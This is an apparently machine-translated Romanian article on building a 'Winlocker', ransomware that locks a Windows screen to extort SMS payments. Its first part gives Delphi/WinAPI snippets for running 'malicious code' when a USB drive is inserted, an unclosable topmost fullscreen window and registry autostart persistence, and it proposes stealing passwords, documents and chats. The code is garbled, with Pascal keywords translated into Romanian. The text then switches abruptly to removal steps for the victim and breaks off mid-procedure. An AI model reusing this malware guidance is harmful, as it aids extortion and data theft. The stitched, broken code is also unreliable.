    Ne-am uitat la funcțiile tipice ale oricărui Winlocker, acum este timpul să ne gândim la cum să ne îmbunătățim creația. Sincer să fiu, nu înțeleg de ce scriitorii de viruși profesioniști nu încorporează suplimentar caracteristici utile. La urma urmei, nu există nicio garanție că utilizatorul va ajunge la telefonul său mobil și va trimite SMS-ul prețuit către număr scurt, îmbogățind astfel autorul virusului. Dar există întotdeauna o șansă de a îndepărta utilizatorul de mașină Informatii utile: parole pentru diverse servicii, documente, conversații Skype înregistrate etc. Nu vom introduce nicio restricție, dar vom actualiza software-ul în conformitate cu program complet. Deci, mai jos am descris șase caracteristici care ar fi utile de implementat într-un astfel de „proiect”.

    Monitorizarea unităților flash

    var
    disc: DWORD;
    ÎNCEPE
    cazul Msg.WParam of
    DBT_DEVICEARRIVAL: //Dacă ați conectat o unitate flash


    ÎNCEPE
    //Încercarea de a determina litera unității
    disc:= PDEV_BROADAST_VOLUME(Msg.LParam" ")^
    .dbcv_unitmask;
    //Execută codul nostru rău intenționat
    Sfârşit;
    DBT_DEVICEREMOVECOMPLETE: //Dacă unitatea flash este scoasă
    dacă (PDEV_BROADCAST_HDR(Msg.LParam)^
    .dbch_devicetype = DBT_DEVTYP_VOLUME) atunci
    ÎNCEPE
    //Unitatea flash a fost montată
    Sfârşit;

    Fereastra neînchisă pe WINDOWS API

    wc.cbSize:=sizeof(wc);
    wc.style:=cs_hredraw sau cs_vredraw;
    wc.lpfnWndProc:=@WindowProc;
    wc.cbClsExtra:=0;
    wc.cbWndExtra:=0;
    wc.hInstance:=HInstance;
    wc.hIcon:=LoadIcon(0,idi_application);
    wc.hCursor:=LoadCursor(0,idc_arrow);
    wc.hbrBackground:=COLOR_BTNFACE+1;
    wc.lpszMenuName:=nil;
    wc.lpszClassName:=’win_main’;
    RegisterClassEx(wc);
    Poz. stânga:=20;
    topPos:=0;
    windowWidth:=Screen.Width;
    WindowHeight:=Screen.Height;
    MainWnd:=CreateWindowEx(
    0,
    'win_main',
    'Test',
    ws_overlappedwindow,
    poziția stângă,
    topPos,
    Lățimea ferestrei,
    Înălțimea ferestrei,
    0,
    0,
    Instanță,
    zero
    );
    SetWindowLong(MainWnd, GWL_HWNDPARENT,
    GetDesktopWindow);
    SetWindowPos(MainWnd, HWND_TOPMOST,
    0, 0, 0, 0, SWP_NOMOVE sau SWP_NOSIZE);
    ShowWindow(MainWnd, CmdShow);
    În timp ce GetMessage(Mesg,0,0,0) face
    ÎNCEPE
    TranslateMessage(Mesg);
    DispatchMessage(Mesg);
    Sfârşit;

    WINAPI pentru lucrul cu registrul

    var
    Cheie: HKey;
    ÎNCEPE
    //Puteți înlocui una dintre căile aici
    lansare.
    RegOpenKey(HKEY_LOCAL_MACHINE,
    PChar(''), Cheie);
    RegSetValueEx(Key,PChar(paramstr(0)),
    0, REG_SZ,
    pchar(paramstr(0)),
    lstrlen(pchar(paramstr(0)))+1);
    RegCloseKey(Cheie);
    Sfârşit;

    Poate fi eliminat destul de simplu; giganții antivirus precum Kaspersky Lab și Dr.Web au pregătit cu mult timp în urmă live CD-uri în acest scop. Recomand să îl descărcați și să îl inscripționați pe disc pentru orice eventualitate. Deci acțiunile noastre:

    1. Verificăm pe site-urile producătorilor de antivirus posibilitatea de a selecta un cod de deblocare. Dacă este potrivit, trecem direct la tratament.
    2. Deci, cea mai comună opțiune este că nimic nu ajută. Aici este locul în care Live CD-ul este util. Cum să lucrați cu acesta este descris de producătorul pe care îl alegeți. Dacă nu avem un disc de vindecare la îndemână, atunci începem să încercăm să ne tratăm singuri.

    Îndepărtarea și tratamentul troienilor winlock

    Reporniți computerul și apăsați butonul F8. În meniul care apare, selectați „Mod sigur cu suport pentru linia de comandă”

    1. Introduceți regedit în consolă și se va deschide editorul de registry. Găsim o ramură în ea HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogonși parametrul Shell

    2. Faceți clic dreapta pe el și selectați Editare. În fereastra care apare, găsiți numele fișierului (cel mai adesea este un set fără sens de numere, numere și litere cu extensia .exe sau .dll) și copiați-l.